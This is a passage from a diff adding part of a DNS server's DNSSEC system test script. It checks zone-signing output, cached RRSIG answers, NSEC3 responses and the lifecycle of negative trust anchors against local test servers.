/dev/null +$SIGNER -O raw -f signer.out.5 -Sxt -o example example.db > /dev/null +$SIGNER -O raw=0 -f signer.out.6 -Sxt -o example example.db > /dev/null +$SIGNER -O raw -f - -Sxt -o example example.db > signer.out.7 2> /dev/null +) || ret=1 +awk 'BEGIN { found = 0; } + $1 == "example." && $3 == "IN" && $4 == "SOA" { found = 1; if (NF != 11) exit(1); } + END { if (!found) exit(1); }' signer/signer.out.3 || ret=1 +awk 'BEGIN { found = 0; } + $1 == "example." && $3 == "IN" && $4 == "SOA" { found = 1; if (NF != 7) exit(1); } + END { if (!found) exit(1); }' signer/signer.out.4 || ret=1 +israw1 signer/signer.out.5 || ret=1 +israw0 signer/signer.out.6 || ret=1 +israw1 signer/signer.out.7 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking TTLs are capped by dnssec-signzone -M ($n)" +ret=0 +( +cd signer || exit 1 +$SIGNER -O full -f signer.out.8 -S -M 30 -o example example.db > /dev/null +) || ret=1 +awk '/^;/ { next; } $2 > 30 { exit 1; }' signer/signer.out.8 || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking dnssec-signzone -N date ($n)" +ret=0 +( +cd signer || exit 1 +TZ=UTC $SIGNER -O full -f signer.out.9 -S -N date -o example example2.db > /dev/null +) || ret=1 +# shellcheck disable=SC2016 +now=$(TZ=UTC $PERL -e '@lt=localtime(); printf "%.4d%0.2d%0.2d00\n",$lt[5]+1900,$lt[4]+1,$lt[3];') +serial=$(awk '/^;/ { next; } $4 == "SOA" { print $7 }' signer/signer.out.9) +[ "$now" -eq "$serial" ] || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking validated data are not cached longer than originalttl ($n)" +ret=0 +dig_with_opts +ttl +noauth a.ttlpatch.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +ttl +noauth a.ttlpatch.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +grep "3600.IN" dig.out.ns3.test$n > /dev/null || ret=1 +grep "300.IN" dig.out.ns3.test$n > /dev/null && ret=1 +grep "300.IN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "3600.IN" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Test that "rndc secroots" is able to dump trusted keys +echo_i "checking rndc secroots ($n)" +ret=0 +keyid=$(cat ns1/managed.key.id) +rndccmd 10.53.0.4 secroots 2>&1 | sed 's/^/ns4 /' | cat_i +cp ns4/named.secroots named.secroots.test$n +check_secroots_layout named.secroots.test$n || ret=1 +linecount=$(grep -c "./$DEFAULT_ALGORITHM/$keyid ; static" named.secroots.test$n || true) +[ "$linecount" -eq 1 ] || ret=1 +linecount=$(< named.secroots.test$n wc -l) +[ "$linecount" -eq 9 ] || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check direct query for RRSIG. If we first ask for normal (non RRSIG) +# record, the corresponding RRSIG should be cached and subsequent query +# for RRSIG will be returned with the cached record. +echo_i "checking RRSIG query from cache ($n)" +ret=0 +dig_with_opts normalthenrrsig.secure.example. @10.53.0.4 a > /dev/null || ret=1 +ans=$(dig_with_opts +short normalthenrrsig.secure.example. @10.53.0.4 rrsig) || ret=1 +expect=$(dig_with_opts +short normalthenrrsig.secure.example. @10.53.0.3 rrsig | grep '^A' ) || ret=1 +test "$ans" = "$expect" || ret=1 +# also check that RA is set +dig_with_opts normalthenrrsig.secure.example. @10.53.0.4 rrsig > dig.out.ns4.test$n || ret=1 +grep "flags:.*ra.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check direct query for RRSIG: If it's not cached with other records, +# it should result in an empty response. +echo_i "checking RRSIG query not in cache ($n)" +ret=0 +ans=$(dig_with_opts +short rrsigonly.secure.example. @10.53.0.4 rrsig) || ret=1 +test -z "$ans" || ret=1 +# also check that RA is cleared +dig_with_opts rrsigonly.secure.example. @10.53.0.4 rrsig > dig.out.ns4.test$n || ret=1 +grep "flags:.*ra.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# RT21868 regression test. +# +echo_i "checking NSEC3 zone with mismatched NSEC3PARAM / NSEC parameters ($n)" +ret=0 +dig_with_opts non-exist.badparam. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# +# RT22007 regression test. +# +echo_i "checking optout NSEC3 referral with only insecure delegations ($n)" +ret=0 +dig_with_opts +norec delegation.single-nsec3. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN.*NSEC3 1 1 1 - 3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN" dig.out.ns2.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking optout NSEC3 NXDOMAIN with only insecure delegations ($n)" +ret=0 +dig_with_opts +norec nonexist.single-nsec3. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN.*NSEC3 1 1 1 - 3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN" dig.out.ns2.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" + +status=$((status+ret)) +echo_i "checking optout NSEC3 nodata with only insecure delegations ($n)" +ret=0 +dig_with_opts +norec single-nsec3. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN.*NSEC3 1 1 1 - 3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN" dig.out.ns2.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that a zone finishing the transition from $ALTERNATIVE_ALGORITHM to $DEFAULT_ALGORITHM validates secure ($n)" +ret=0 +dig_with_opts ns algroll. @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking validate-except in an insecure local domain ($n)" +ret=0 +dig_with_opts ns www.corp @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive and negative validation with negative trust anchors ($n)" +ret=0 + +# +# check correct initial behavior +# +dig_with_opts a.bogus.example. a @10.53.0.4 > dig.out.ns4.test$n.1 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.1 > /dev/null || ret=1 +dig_with_opts badds.example. soa @10.53.0.4 > dig.out.ns4.test$n.2 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.2 > /dev/null || ret=1 +dig_with_opts a.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.3 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.3 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.3 > /dev/null || ret=1 + +if [ "$ret" -ne 0 ]; then echo_i "failed - checking initial state"; fi +status=$((status+ret)) +ret=0 + +# +# add negative trust anchors +# +rndccmd 10.53.0.4 nta -f -l 20s bogus.example 2>&1 | sed 's/^/ns4 /' | cat_i +rndccmd 10.53.0.4 nta badds.example 2>&1 | sed 's/^/ns4 /' | cat_i +# reconfig should maintain NTAs +rndccmd 10.53.0.4 reconfig 2>&1 | sed 's/^/ns4 /' | cat_i +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1 +lines=$(wc -l < rndc.out.ns4.test$n.1) +[ "$lines" -eq 2 ] || ret=1 +rndccmd 10.53.0.4 nta secure.example 2>&1 | sed 's/^/ns4 /' | cat_i +rndccmd 10.53.0.4 nta fakenode.secure.example 2>&1 | sed 's/^/ns4 /' | cat_i +# reload should maintain NTAs +rndc_reload ns4 10.53.0.4 +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.2 +lines=$(wc -l < rndc.out.ns4.test$n.2) +[ "$lines" -eq 4 ] || ret=1 +# shellcheck disable=SC2016 +start=$($PERL -e 'print time()."\n";') + +if [ "$ret" -ne 0 ]; then echo_i "failed - adding NTA's failed"; fi +status=$((status+ret)) +ret=0 + +# +# check behavior with NTA's in place +# +dig_with_opts a.bogus.example. a @10.53.0.4 > dig.out.ns4.test$n.4 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.4 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.4 > /dev/null && ret=1 +dig_with_opts badds.example. soa @10.53.0.4 > dig.out.ns4.test$n.5 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.5 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.5 > /dev/null && ret=1 +dig_with_opts a.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.6 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.6 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.6 > /dev/null && ret=1 +dig_with_opts a.fakenode.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.7 || ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.7 > /dev/null && ret=1 +echo_i "dumping secroots" +rndccmd 10.53.0.4 secroots | sed 's/^/ns4 /' | cat_i +cp ns4/named.secroots named.secroots.test$n +check_secroots_layout named.secroots.test$n || ret=1 +grep "bogus.example: expiry" named.secroots.test$n > /dev/null || ret=1 +grep "badds.example: expiry" named.secroots.test$n > /dev/null || ret=1 +grep "secure.example: expiry" named.secroots.test$n > /dev/null || ret=1 +grep "fakenode.secure.example: expiry" named.secroots.test$n > /dev/null || ret=1 + +if [ "$ret" -ne 0 ]; then echo_i "failed - with NTA's in place failed"; fi +status=$((status+ret)) +ret=0 + +echo_i "waiting for NTA rechecks/expirations" + +# +# secure.example and badds.example used default nta-duration +# (configured as 12s in ns4/named1.conf), but nta recheck interval +# is configured to 9s, so at t=10 the NTAs for secure.example and +# fakenode.secure.example should both be lifted, but badds.example +# should still be going. +# +# shellcheck disable=SC2016 +$PERL -e 'my $delay = '"$start"' + 10 - time(); select(undef, undef, undef, $delay) if ($delay > 0);' +dig_with_opts b.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.8 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.8 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.8 > /dev/null || ret=1 +dig_with_opts b.fakenode.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.9 || ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.9 > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n.9 > /dev/null || ret=1 +dig_with_opts badds.example. soa @10.53.0.4 > dig.out.ns4.test$n.10 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.10 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.10 > /dev/null && ret=1 + +if [ "$ret" -ne 0 ]; then echo_i "failed - checking that default nta's were lifted due to recheck"; fi +status=$((status+ret)) +ret=0 + +# +# bogus.example was set to expire in 20s, so at t=13 +# it should still be NTA'd, but badds.example used the default +# lifetime of 12s, so it should revert to SERVFAIL now. +# +# shellcheck disable=SC2016 +$PERL -e 'my $delay = '"$start"' + 13 - time(); select(undef, undef, undef, $delay) if ($delay > 0);' +# check nta table +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n._11 +lines=$(grep -c " expiry " rndc.out.ns4.test$n._11 || true) +[ "$lines" -le 2 ] || ret=1 +grep "bogus.example/_default: expiry" rndc.out.ns4.test$n._11 > /dev/null || ret=1 +grep "badds.example/_default: expiry" rndc.out.ns4.test$n._11 > /dev/null && ret=1 +dig_with_opts b.bogus.example. a @10.53.0.4 > dig.out.ns4.test$n.11 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.11 > /dev/null && ret=1 +dig_with_opts a.badds.example. a @10.53.0.4 > dig.out.ns4.test$n.12 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.12 > /dev/null || ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.12 > /dev/null && ret=1 +dig_with_opts c.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.13 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.13 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.13 > /dev/null || ret=1 + +if [ "$ret" -ne 0 ]; then echo_i "failed - checking that default nta's were lifted due to lifetime"; fi +status=$((status+ret)) +ret=0 + +# +# at t=21, all the NTAs should have expired. +# +# shellcheck disable=SC2016 +$PERL -e 'my $delay = '"$start"' + 21 - time(); select(undef, undef, undef, $delay) if ($delay > 0);' +# check correct behavior after bogus.example expiry +dig_with_opts d.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.14 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.14 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.14 > /dev/null || ret=1 +dig_with_opts c.bogus.example. a @10.53.0.4 > dig.out.ns4.test$n.15 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.15 > /dev/null || ret=1 +# check nta table has been cleaned up now +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.3 +lines=$(grep -c " expiry " rndc.out.ns4.test$n.3 || true) +[ "$lines" -eq 0 ] || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed - checking that all nta's have been lifted"; fi +status=$((status+ret)) +ret=0 + +echo_i "testing NTA removals ($n)" +rndccmd 10.53.0.4 nta badds.example 2>&1 | sed 's/^/ns4 /' | cat_i +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1 +grep "badds.example/_default: expiry" rndc.out.ns4.test$n.1 > /dev/null || ret=1 +dig_with_opts a.badds.example. a @10.53.0.4 > dig.out.ns4.test$n.1 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.1 > /dev/null && ret=1 +grep "^a.badds.example." dig.out.ns4.test$n.1 > /dev/null || ret=1 +rndccmd 10.53.0.4 nta -remove badds.example > rndc.out.ns4.test$n.2 +grep "Negative trust anchor removed: badds.example/_default" rndc.out.ns4.test$n.2 > /dev/null || ret=1 +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.3 +grep "badds.example/_default: expiry" rndc.out.ns4.test$n.3 > /dev/null && ret=1 +dig_with_opts a.badds.example. a @10.53.0.4 > dig.out.ns4.test$n.2 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.2 > /dev/null || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) +ret=0 + +echo_i "remove non-existent NTA three times" +rndccmd 10.53.0.4 nta -r foo > rndc.out.ns4.test$n.4 2>&1 +rndccmd 10.53.0.4 nta -remove foo > rndc.out.ns4.test$n.5 2>&1 +rndccmd 10.53.0.4 nta -r foo > rndc.out.ns4.test$n.6 2>&1 +grep "not found" rndc.out.ns4.test$n.6 > /dev/null || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) +ret=0 + +n=$((n+1)) +echo_i "testing NTA with bogus lifetimes ($n)" +echo_i "check with no nta lifetime specified" +rndccmd 10.53.0.4 nta -l "" foo > rndc.out.ns4.test$n.1 2>&1 || true +grep "'nta' failed: bad ttl" rndc.out.ns4.test$n.1 > /dev/null || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) +ret=0 + +echo_i "check with bad nta lifetime" +rndccmd 10.53.0.4 nta -l garbage foo > rndc.out.ns4.test$n.2 2>&1 || true +grep "'nta' failed: bad ttl" rndc.out.ns4.test$n.2 > /dev/null || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) +ret=0 + +echo_i "check with too long nta lifetime" +rndccmd 10.53.0.4 nta -l 7d1h foo > rndc.out.ns4.test$n.3 2>&1 || true +grep "'nta' failed: out of range" rndc.out.ns4.test$n.3 > /dev/null || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) +ret=0 + +# +# check NTA persistence across restarts +# +n=$((n+1)) +echo_i "testing NTA persistence across restarts ($n)" +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1 +lines=$(grep -c " expiry " rndc.out.ns4.test$n.1 || true) +[ "$lines" -eq 0 ] || ret=1 +rndccmd 10.53.0.4 nta -f -l 30s bogus.example 2>&1 | sed 's/^/ns4 /' | cat_i +rndccmd 10.53.0.4 nta -f -l 10s badds.example 2>&1 | sed 's/^/ns4 /' | cat_i +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.2 +lines=$(grep -c " expiry " rndc.out.ns4.test$n.2 || true) +[ "$lines" -eq 2 ] || ret=1 +# shellcheck disable=SC2016 +start=$($PERL -e 'print time()."\n";') + +if [ "$ret" -ne 0 ]; then echo_i "failed - NTA persistence: adding NTA's failed"; fi +status=$((status+ret)) +ret=0 + +echo_i "killing ns4 with SIGTERM" +$KILL -TERM "$(cat ns4/named.pid)" +rm -f ns4/named.pid + +# +# ns4 has now shutdown. wait until t=14 when badds.example's NTA +# (lifetime=10s) would have expired, and then restart ns4. +# +echo_i "waiting till 14s have passed since NTAs were added before restarting ns4" +# shellcheck disable=SC2016 +$PERL -e 'my $delay = '"$start"' + 14 - time(); select(undef, undef, undef, $delay) if ($delay > 0);' + +if + start_server --noclean --restart --port "$PORT" ns4 +then + echo_i "restarted server ns4" +else + echo_i "could not restart server ns4" + exit 1 +fi + +echo_i "sleeping for an additional 4 seconds for ns4 to fully startup" +sleep 4 + +# +# ns4 should be back up now. The NTA for bogus.example should still be +# valid, whereas badds.example should not have been added during named +# startup (as it had already expired), the fact that it's ignored should +# be logged. +# +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.3 +lines=$(wc -l < rndc.out.ns4.test$n.3) +[ "$lines" -eq 1 ] || ret=1 +grep "bogus.example/_default: expiry" rndc.out.ns4.test$n.3 > /dev/null || ret=1 +dig_with_opts b.bogus.example. a @10.53.0.4 > dig.out.ns4.test$n.4 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.4 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.4 > /dev/null && ret=1 +dig_with_opts a.badds.example. a @10.53.0.4 > dig.out.ns4.test$n.5 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.5 > /dev/null || ret=1 +grep "ignoring expired NTA at badds.example" ns4/named.run > /dev/null || ret=1 + +# cleanup +rndccmd 10.53.0.4 nta -remove bogus.example > rndc.out.ns4.test$n.6 + +if [ "$ret" -ne 0 ]; then echo_i "failed - NTA persistence: restoring NTA failed"; fi +status=$((status+ret)) +ret=0 + +# +# check "regular" attribute in NTA file works as expected at named +# startup. +# +n=$((n+1)) +echo_i "testing loading regular attribute from NTA file ($n)" +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1 2>/dev/null +lines=$(wc -l < rndc.out.ns4.test$n.1) +[ "$lines" -eq 0 ] || ret=1 +# initially, secure.example. validates with AD=1 +dig_with_opts a.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.2 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.2 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.2 > /dev/null || ret=1 + +echo_i "killing ns4 with SIGTERM" +$KILL -TERM "$(cat ns4/named.pid)" +rm -f ns4/named.pid + +echo_i "sleeping for an additional 4 seconds for ns4 to fully shutdown" +sleep 4 + +# +# ns4 has now shutdown. add NTA for secure.example. directly into the +# _default.nta file with the regular attribute and some future timestamp. +# +future="$(($(date +%Y)+20))0101010000" +echo "secure.example. regular $future" > ns4/_default.nta +# shellcheck disable=SC2016 +start=$($PERL -e 'print time()."\n";') + +if + start_server --noclean --restart --port "$PORT" ns4 +then + echo_i "restarted server ns4" +else + echo_i "could not restart server ns4" + exit 1 +fi + +# nta-recheck is configured as 9s, so at t=12 the NTAs for +# secure.example. should be lifted as it is not a forced NTA. +echo_i "waiting till 12s have passed after ns4 was restarted" +# shellcheck disable=SC2016 +$PERL -e 'my $delay = '"$start"' + 12 - time(); select(undef, undef, undef, $delay) if ($delay > 0);' + +# secure.example. should now return an AD=1 answer (still validates) as +# the NTA has been lifted. +dig_with_opts a.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.3 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.3 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.3 > /dev/null || ret=1 + +# cleanup +rndccmd 10.53.0.4 nta -remove secure.example > rndc.out.ns4.test$n.4 2>/dev/null + +if [ "$ret" -ne 0 ]; then echo_i "failed - NTA persistence: loading regular NTAs failed"; fi +status=$((status+ret)) +ret=0 + +# +# check "forced" attribute in NTA file works as expected at named +# startup. +# +n=$((n+1)) +echo_i "testing loading forced attribute from NTA file ($n)" +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1 2>/dev/null +lines=$(wc -l < rndc.out.ns4.test$n.1) +[ "$lines" -eq 0 ] || ret=1 +# initially, secure.example. validates with AD=1 +dig_with_opts a.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.2 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.2 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.2 > /dev/null || ret=1 + +echo_i "killing ns4 with SIGTERM" +$KILL -TERM "$(cat ns4/named.pid)" +rm -f named.pid + +echo_i "sleeping for an additional 4 seconds for ns4 to fully shutdown" +sleep 4 + +# +# ns4 has now shutdown. add NTA for secure.example. directly into the +# _default.nta file with the forced attribute and some future timestamp. +# +echo "secure.example. forced $future" > ns4/_default.nta +start=$($PERL -e 'print time()."\n";') + +if + start_server --noclean --restart --port "$PORT" ns4 +then + echo_i "restarted server ns4" +else + echo_i "could not restart server ns4" + exit 1 +fi + +# nta-recheck is configured as 9s, but even at t=12 the NTAs for +# secure.example. should not be lifted as it is a forced NTA. +echo_i "waiting till 12s have passed after ns4 was restarted" +# shellcheck disable=SC2016 +$PERL -e 'my $delay = '"$start"' + 12 - time(); select(undef, undef, undef, $delay) if ($delay > 0);' + +# secure.example. should now return an AD=0 answer (non-authenticated) +# as the NTA is still there. +dig_with_opts a.secure.example. a @10.53.0.4 > dig.out.ns4.test$n.3 || ret=1 +grep "status: SERVFAIL" dig.out.ns4.test$n.3 > /dev/null && ret=1 +grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n.3 > /dev/null && ret=1 + +# cleanup +rndccmd 10.53.0.4 nta -remove secure.example > rndc.out.ns4.test$n.4 2>/dev/null + +if [ "$ret" -ne 0 ]; then echo_i "failed - NTA persistence: loading forced NTAs failed"; fi +status=$((status+ret)) +ret=0 + +# +# check that NTA lifetime read from file is clamped to 1 week. +# +n=$((n+1)) +echo_i "testing loading out of bounds lifetime from NTA file ($n)" + +echo_i "killing ns4 with SIGTERM" +$KILL -TERM "$(cat ns4/named.pid)" +rm -f ns4/named.pid + +echo_i "sleeping for an additional 4 seconds for ns4 to fully shutdown" +sleep 4 + +# +# ns4 has now shutdown. add NTA for secure.example. directly into the +# _default.nta file with a lifetime well into the future. +# +echo "secure.example. forced $future" > ns4/_default.nta +added=$($PERL -e 'print time()."\n";') + +if + start_server --noclean --restart --port "$PORT" ns4 +then + echo_i "restarted server ns4" +else + echo_i "could not restart server ns4" + exit 1 +fi + +echo_i "sleeping for an additional 4 seconds for ns4 to fully startup" +sleep 4 + +# dump the NTA to a file (omit validate-except entries) +echo_i "testing 'rndc nta'" +rndccmd 10.53.0.4 nta -d > rndc.out.ns4.test$n.1 2>/dev/null +# "corp" is configured as a validate-except domain and thus should be +# omitted. only "secure.example" should be in the dump at this point. +lines=$(wc -l < rndc.out.ns4.test$n.1) +[ "$lines" -eq 1 ] || ret=1 +grep 'secure.example' rndc.out.ns4.test$n.1 > /dev/null || ret=1 +ts=$(awk '{print $3" "$4}' < rndc.out.ns4.test$n.1) +# rndc nta outputs localtime, so append the timezone +ts_with_zone="$ts $(date +%z)" +echo "ts=$ts" > rndc.out.ns4.test$n.2 +echo "ts_with_zone=$ts_with_zone" >> rndc.out.ns4.test$n.2 +echo "added=$added" >> rndc.out.ns4.test$n.2 +if $PERL -e 'use Time::Piece; use Time::Seconds;' 2>/dev/null +then + # ntadiff.pl computes $ts_with_zone - ($added + 1week) + d=$($PERL ./ntadiff.pl "$ts_with_zone" "$added") + echo "d=$d" >> rndc.out.ns4.test$n.2 + # diff from $added(now) + 1week to the clamped NTA lifetime should be + # less than a few seconds (handle daylight saving changes by adding 3600). + [ "$d" -lt 3610 ] || ret=1 +else + echo_i "skipped ntadiff test; install PERL module Time::Piece" +fi + +# cleanup +rndccmd 10.53.0.4 nta -remove secure.example > rndc.out.ns4.test$n.3 2>/dev/null + +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed - NTA lifetime clamping failed"; fi +status=$((status+ret)) + +echo_i "checking that NTAs work with 'forward only;' to a validating resolver ($n)" +ret=0 +# Sanity check behavior without an NTA in place. +dig_with_opts @10.53.0.9 badds.example. SOA > dig.out.ns9.test$n.1 || ret=1 +grep "SERVFAIL" dig.out.ns9.test$n.1 > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns9.test$n.1 > /dev/null || ret=1 +grep "flags:[^;]* ad[ ;].*QUERY" dig.out.ns9.test$n.1 > /dev/null && ret=1 +# Add an NTA, expecting that to cause resolution to succeed. +rndccmd 10.53.0.9 nta badds.example > rndc.out.ns9.test$n.1 2>&1 || ret=1 +dig_with_opts @10.53.0.9 badds.example. SOA > dig.out.ns9.test$n.2 || ret=1 +grep "NOERROR" dig.out.ns9.test$n.2 > /dev/null || ret=1 +grep "ANSWER: 2" dig.out.ns9.test$n.2 > /dev/null || ret=1 +grep "flags:[^;]* ad[ ;].*QUERY" dig.out.ns9.test$n.2 > /dev/null && ret=1 +# Remove the NTA, expecting that to cause resolution to fail again. +rndccmd 10.53.0.9 nta -remove badds.example > rndc.out.ns9.test$n.2 2>&1 || ret=1 +dig_with_opts @10.53.0.9 badds.example. SOA > dig.out.ns9.test$n.3 || ret=1 +grep "SERVFAIL" dig.out.ns9.test$n.3 > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns9.test$n.3 > /dev/null || ret=1 +grep "flags:[^;]* ad[ ;].*QUERY" dig.out.ns9.test$n.3 > /dev/null && ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "completed NTA tests" + +# Run a minimal update test if possible. This is really just +# a regression test for RT #2399; more tests should be added. + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + echo_i "running DNSSEC update test" + ret=0 + output=$($PERL dnssec_update_test.pl -s 10.53.0.3 -p "$PORT" dynamic.example.) + test "$?" -eq 0 || ret=1 + echo "$output" | cat_i + [ $ret -eq 1 ] && status=1 +else + echo_i "The DNSSEC update test requires the Net::DNS library." >&2 +fi + +n=$((n+1)) +echo_i "checking managed key maintenance has not started yet ($n)" +ret=0 +[ -f "ns4/managed-keys.bind.jnl" ] && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Reconfigure caching server to use "dnssec-validation auto", and repeat +# some of the DNSSEC validation tests to ensure that it works correctly. +# Also setup a placeholder managed-keys zone to check if named can process it +# correctly. +echo_i "switching to automatic root key configuration" +cp ns4/managed-keys.bind.in ns4/managed-keys.bind +copy_setports ns4/named2.conf.in ns4/named.conf +rndccmd 10.53.0.4 reconfig 2>&1 | sed 's/^/ns4 /' | cat_i +sleep 5 + +echo_i "checking managed key maintenance timer has now started ($n)" +ret=0 +[ -f "ns4/managed-keys.bind.jnl" ] || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive validation NSEC ($n)" +ret=0 +dig_with_opts +noauth a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth a.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking positive validation NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.nsec3.example. \ + 